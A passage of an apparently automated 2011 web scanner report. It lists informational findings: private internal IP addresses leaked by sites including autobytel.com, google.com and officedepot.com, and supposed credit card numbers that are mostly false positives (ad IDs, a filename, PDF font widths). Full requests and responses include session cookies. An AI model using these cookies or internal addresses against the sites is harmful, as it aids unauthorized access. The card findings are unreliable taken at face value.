<br>X-Digg-Time: D=28518 10.2.129.225<br>
...[SNIP]...
<br>X-Digg-Time: D=24007 10.2.130.111<br>
...[SNIP]...
<br>X-Digg-Time: D=28518 10.2.129.225<br>
...[SNIP]...
<li>10.2.130.111</li>
...[SNIP]...
<span class="HIGHLIGHT">10.2.130.111</span>
...[SNIP]...
<span class="HIGHLIGHT">10.2.130.111</span>
...[SNIP]...
<li>10.2.129.225</li>
...[SNIP]...
<span class="HIGHLIGHT">10.2.129.225</span>
...[SNIP]...
<span class="HIGHLIGHT">10.2.129.225</span>
...[SNIP]...

25.2. http://green.autobytel.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://green.autobytel.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.4.128.192

Request

GET / HTTP/1.1
Host: green.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: cweb=JONQJVS10.4.128.192CKMMI; path=/
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: USER_UUID_VCH=45B1050B%2DCA19%2DA839%2DE9A7BDE5F665AC56;expires=Wed, 16-Jan-2041 22:36:00 GMT;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 22:36:00 GMT;path=/
Set-Cookie: COUNT=0;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2014%3A35%3A00%27%7D;path=/
Set-Cookie: COUNT=1;expires=Wed, 16-Jan-2041 22:36:00 GMT;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2018%3A36%3A00%27%7D;expires=Wed, 16-Jan-2041 22:36:00 GMT;path=/
Set-Cookie: ID=27696%3Bhybd;path=/
Set-Cookie: HOMEVERSION=2;path=/
Date: Mon, 24 Jan 2011 22:36:00 GMT
Connection: close
Content-Length: 31347

<!-- CWEB429 --><!-- green -->

<html>

<head>


<title>New Cars | Used Cars for Sale | New and Used Car Prices</title>

<!-- meta -->

<meta name="description" content="New cars, used cars: prices
...[SNIP]...

25.3. http://whdhstore.hipcricket.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://whdhstore.hipcricket.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 192.168.10.76

Request

GET / HTTP/1.1
Host: whdhstore.hipcricket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 23:10:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP=\"IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\"
Content-Length: 19423
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSTATBQ=FMADLDFCELMBEGBAHKIFEOLO; path=/
Cache-control: private


<style type="text/css">
/* classic styles pulled in from old template - using arial instead of TNR */
td {font-family:Arial; font-size:12px;color:#000000;}
p {font-family:Arial; font-size:12px;}
...[SNIP]...
<!-- 192.168.10.76 -->
...[SNIP]...

25.4. http://www.autobytel.com/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /x22

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.4.128.184

Request

GET /x22 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23119
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 16:04:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 16:04:10 GMT
Connection: close
Set-Cookie: cweb=JONQJVS10.4.128.184CKMMK; path=/
Set-Cookie: USER_UUID_VCH=37AC631C%2DE9D5%2DFD37%2DEDAF61EB5BA1725D;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
Set-Cookie: COUNT=0;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2008%3A03%3A09%27%7D;path=/
Set-Cookie: COUNT=1;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2012%3A04%3A09%27%7D;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
Set-Cookie: ID=4%3BABTL;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=1;path=/


<!-- begin: fnc_getComputerName.cfm -->

<!-- end: fnc_getComputerName.cfm -->
<!-- ReferringSite: --> <!-- Referer: None --> <!--
This file creates a boxerjam cookie that expires
...[SNIP]...

25.5. http://www.digitaltips.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.digitaltips.org
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.0.0.57

Request

GET / HTTP/1.1
Host: www.digitaltips.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 13:13:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 15408
Content-Type: text/html
Expires: Tue, 25 Jan 2011 13:12:49 GMT
Set-Cookie: ASPSESSIONIDQACCSATA=CBMAPNKCICCPLJELGPNDBBAG; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- PageID 106 - published by Open Text Web Solutions 10 - 10.0.0.57 - 29635 -->
...[SNIP]...

25.6. http://www.google.com/sdch/GeNLY2f-.dct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sdch/GeNLY2f-.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 172.31.196.197

Request

GET /sdch/GeNLY2f-.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt
If-Modified-Since: Fri, 21 Jan 2011 14:44:32 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Mon, 24 Jan 2011 10:48:22 GMT
Date: Mon, 24 Jan 2011 14:54:00 GMT
Expires: Mon, 24 Jan 2011 14:54:00 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 107132

Domain: .google.com
Path: /search

- Google Search</title><script>window.google={kEI:" QT0T WJ_5AKtpypmg8",kEXPI:"27344,27642,27744WJ_5AKtpypmg8",expi:"27344,27642,27744CMMWJ_5
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: 4AUACFJFdYwJ:search.aol.com/+aolMJE2Iq51jh0J:webmail.aol.com/+aol3-ZEIkE37Z4J:www.directv.com/+direct &amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'
...[SNIP]...
<a href="/search?hl=en&amp;q=inauthor:&quot; http://172.31.196.197:8888/search?q=cache: dictionary.reference.com/browse/ &amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','1 2','','0CD ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:v_TYzMSa2vkJ:www.whitepages.com/+ &amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','1 wQqwMoA ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J: i en.wikipedia.org/wiki/DirecTV+direct www.directv.com/DTVAPP/epg/theGuide.jsp+direct www.directv.com/DTVAPP/content/ +direct
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','6','','0C c ')">
...[SNIP]...
<a href="/search?hl=en&amp;q=inauthor:&quot;http://172.31.196.197:8888/search?q=cache: " onmousedown="return clk(this.href,'','','',' 7','','0C ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','1','','0CC QIDAA')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: J:explore.live.com/windows-live- &amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','',' &amp;tbo=1&amp;sa=X&amp;ei=4AT0TsWJ_5AKtpypmg
...[SNIP]...
<a href="/search?hl=en&amp;q=related: s&amp;tbo=1&amp;sa=X&amp;ei=4AT0Thttp://172.31.196.197:8888/search?q=cache:&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','10','','0C opics.nytimes.com/top/news/business/companies/ WJ_5AKtpypm
...[SNIP]...

25.7. http://www.metacafe.com/fplayer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metacafe.com
Path:   /fplayer/

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 172.16.176.202

Request

GET /fplayer/ HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Type: text/html
Date: Tue, 25 Jan 2011 04:45:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=37405ae87945ce0d058ea5e18b5a73df; path=/; domain=.metacafe.com
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
Set-Cookie: OAID=f488ed4f4e9ec6a273b4b088e853dd33; expires=Wed, 25-Jan-2012 04:45:05 GMT; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%225ff37793909b485fc44ca3c3af4425f7%22%2C%22LEID%22%3A15%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22pve%22%3A1%7D; expires=Sun, 24-Jan-2016 04:45:05 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3400536236.20480.0000; expires=Tue, 25-Jan-2011 05:45:05 GMT; path=/
Content-Length: 160213

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<!--
           var omniProps = {"serverName":"270211-web56.metacafe.com","maxFlashVersion":"9","eVar1":"not logged-in","eVar2":"family filter on","prop1":15,"prop2":"C=244 L=9","server":"172.16.176.202","events":null,"prop46":"KPI-fplayer","pageName":"Metacafe homepage","channel":"Home","prop28":"2","prop34":"2","":"0","prop49":"0","prop47":"0"};
           var omniCookieObj = MooTools.version == '1.11' ?
...[SNIP]...
tp:') {
                   iOmnitureMC = new OmnitureMC({"serverName":"270211-web56.metacafe.com","maxFlashVersion":"9","eVar1":"not logged-in","eVar2":"family filter on","prop1":15,"prop2":"C=244 L=9","server":"172.16.176.202","events":null,"prop46":"KPI-fplayer","pageName":"Metacafe homepage","channel":"Home","prop28":"2","prop34":"2","":"0","prop49":"0","prop47":"0"}, {"WikiRecentChanges":{"events":"event67"}});
               }
...[SNIP]...

25.8. http://www.myride.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myride.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.4.128.192

Request

GET / HTTP/1.1
Host: www.myride.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:08:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:08:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cweb=JONQJVS10.4.128.192CKMMI; path=/
Set-Cookie: USER_UUID_VCH=48FF47EA%2DCE8D%2DEABF%2D0FDF88CEC9C9E345;expires=Thu, 17-Jan-2041 00:08:26 GMT;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:08:26 GMT;path=/
Set-Cookie: COUNT=0;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2016%3A07%3A26%27%7D;path=/
Set-Cookie: COUNT=1;expires=Thu, 17-Jan-2041 00:08:26 GMT;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2020%3A08%3A26%27%7D;expires=Thu, 17-Jan-2041 00:08:26 GMT;path=/
Set-Cookie: ID=27821%3BRIDE;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=1;path=/
Content-Length: 42720

<!-- CWEB429 --><!-- www -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   
       <title>New Cars | Used Cars for Sale | New and Used Car Prices | MyRide.com</title>
...[SNIP]...

25.9. http://www.officedepot.com/promo.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.officedepot.com
Path:   /promo.do

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.95.65.84

Request

GET /promo.do HTTP/1.1
Host: www.officedepot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="ALL DEVa TAIa OUR BUS UNI NAV STA PRE" policyref="http://www.officedepot.com/w3c/p3p.xml"
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Tue, 25 Jan 2011 05:04:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic; Path=/
Set-Cookie: jsession_unique_id=1295931847463; Expires=Tue, 25 Jan 2011 06:34:07 GMT; Path=/
Set-Cookie: CU_BRAND=OD; Expires=Fri, 20 Jan 2012 05:04:07 GMT; Path=/
Set-Cookie: IBSD_LOCALE=en_US; Expires=Fri, 20 Jan 2012 05:04:07 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=5yEwWrYJ3VxcYFAH_1ES2aP; Expires=Thu, 24 Feb 2011 05:04:07 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=5yEwWrYJ3VxcYFAH_1ES2aP; Expires=Thu, 24 Feb 2011 05:04:07 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=5yEwWrYJ3VxcYFAH_1ES2aP; Expires=Thu, 24 Feb 2011 05:04:07 GMT; Path=/
Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com
Content-Length: 73834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html class="nojs" xmlns=
...[SNIP]...
<!--
Build: 2010.12.09 12:29:46 EST - REV - http://10.95.65.84/od/ecom/branches/www/WWW_20101119/ - Archive - WWW_BRANCH_20101209
-->
...[SNIP]...

25.10. http://www.x64bitdownload.com/64-bit-news-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-news-downloads.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.1.1.4

Request

GET /64-bit-news-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86979


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</a> 10.1.1.4
       &nbsp;&nbsp; <div class="legend">
...[SNIP]...

25.11. http://www.x64bitdownload.com/64-bit-ssl-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-ssl-downloads.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.3.0.1

Request

GET /64-bit-ssl-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:06 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87821


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</a> 10.3.0.1
       &nbsp;&nbsp; <div class="legend">
...[SNIP]...

25.12. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-synchronization-downloads.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.1.1.4

Request

GET /64-bit-synchronization-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90120


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</a> 10.1.1.4
       &nbsp;&nbsp; <div class="legend">
...[SNIP]...

26. Credit card numbers disclosed
There are 5 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.


26.1. http://d1.openx.org/ajs.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /ajs.php

Issue detail

The following credit card number was disclosed in the response:
  • 5834998644254472

Request

GET /ajs.php?zoneid=17099&cb=49902098508&charset=UTF-8&loc=http%3A//www.netlingo.com/ HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:05:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=3c7e6ab0aff972631f0dd2dc260083ec; expires=Wed, 25-Jan-2012 02:05:01 GMT; path=/
Content-Length: 4795
Connection: close
Content-Type: text/javascript; charset=UTF-8

var OX_9ad7ea60 = '';
OX_9ad7ea60 += "<"+"script type=\"text/javascript\">\n";
OX_9ad7ea60 += "OXM_ad = {\"website\":\"7f43337b-cb6f-453f-9ae5-4abd7cd18bda\",\n";
OX_9ad7ea60 += "\"size\":\"468x60\",\n";
OX_9ad7ea60 += "\"floor\":\"0.1\",\n";
OX_9ad7ea60 += "\"channel\":\"oxpv1:58349-98644-254472-4738-17099\",\n";
OX_9ad7ea60 += "\"hrid\":\"dda27c0e92ce176b4b94dc8a5861a24c-1295921101\",\n";
OX_9ad7ea60 += "\"beacon\":\"<"+"div id=\'beacon_a2563a7fcc\' style=\'position: absolute; left: 0px; top
...[SNIP]...

26.2. http://www.masjo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.masjo.com
Path:   /

Issue detail

The following credit card number was disclosed in the response:
  • 4406691295577660

Request

GET / HTTP/1.1
Host: www.masjo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=143117481.1295903077.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/30; __utma=143117481.1825936610.1295903073.1295903073.1295903073.1; __utmc=143117481; __utmb=143117481.1.10.1295903073;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
Vary: Accept-Encoding,Cookie
Cache-Control: max-age=300, must-revalidate
WP-Super-Cache: Served supercache file from PHP
Content-Length: 44976
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<img src="http://www.masjo.com/wp-content/themes/masjo/thumb.php?src=wp-content/plugins/archieve/images/d31a6_marshallsoft_gps_component_for_vb-440669-1295577660.jpeg&amp;w=100&amp;h=100&amp;zc=1&amp;q=90" alt="MarshallSoft GPS Component for VB" class="thumbnail alignleft woo-image" width="100" height="100" />
...[SNIP]...

26.3. http://www.netlingo.com/2010mediakit.pdf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /2010mediakit.pdf

Issue detail

The following credit card number was disclosed in the response:
  • 4984440000000000

Request

GET /2010mediakit.pdf HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 07 Feb 2010 03:22:17 GMT
ETag: "3367fb-1c78e-31118c40"
Accept-Ranges: bytes
Content-Length: 116622
Connection: close
Content-Type: application/pdf

%PDF-1.4%....
162 0 obj<</H[1094 315]/Linearized 1/E 14520/L 116622/N 5/O 165/T 113334>>endobj
...[SNIP]...
89 601 678 561 521 667 0 373 417 0 498 771 667 708 551 708 621 557 584 656 597 902 581 576 0 0 0 0 0 0 0 525 553 461 553 526 318 553 558 229 282 498 229 840 558 543 553 553 360 446 334 558 498 742 495 498 444 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 211 401 401 0 546]>
...[SNIP]...

26.4. http://www.netlingo.com/news/Safe_and_Secure_in_Cyberspace.pdf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /news/Safe_and_Secure_in_Cyberspace.pdf

Issue detail

The following credit card number was disclosed in the response:
  • 3520459063600269

Request

GET /news/Safe_and_Secure_in_Cyberspace.pdf HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:24 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 22 Jan 2009 13:06:12 GMT
ETag: "367848-b2e9-efc75900"
Accept-Ranges: bytes
Content-Length: 45801
Connection: close
Content-Type: application/pdf
X-Pad: avoid browser bug

%PDF-1.4%....
183 0 obj<</H[1423 303]/Linearized 1/E 32077/L 45774/N 2/O 186/T 42093>>endobj
xref
183 55
0000000016 00000 n
0000001905 00000 n
0000001423 00000 n
0000002141
...[SNIP]...
</Type/Font/Encoding/WinAnsiEncoding/BaseFont/Verdana/FirstChar 32/LastChar 122/Subtype/TrueType/FontDescriptor 205 0 R/Widths[352 0 459 0 636 0 0 269 0 0 0 0 364 454 364 454 0 636 636 0 0 0 0 0 0 636 454 0 0 0 0 545 0 684 686 698 771 632 575 0 0 421 455 0 557 843 0 787 603 0 695 684 616 0 0 989 0 615 0 0 0 0 0 0 0 601 623 521 623 596 352 623 633 27
...[SNIP]...

26.5. http://www.parenthood.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parenthood.com
Path:   /

Issue detail

The following credit card number was disclosed in the response:
  • 5122305315883814

Request

GET / HTTP/1.1
Host: www.parenthood.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:54:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=2bb2r6pp17500tshvuo5ak5ap5; path=/
Vary: Accept-Encoding
Cache-Control: public
Expires: Thu, 15 May 2010 20:00:00 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerwww_parenthood.com_http_pool=457334026.20480.0000; path=/
Content-Length: 106355


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<meta htt
...[SNIP]...
<input type="hidden" name="client" value="pub-5122305315883814" />
...[SNIP]...

27. Robots.txt file
There are 9 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

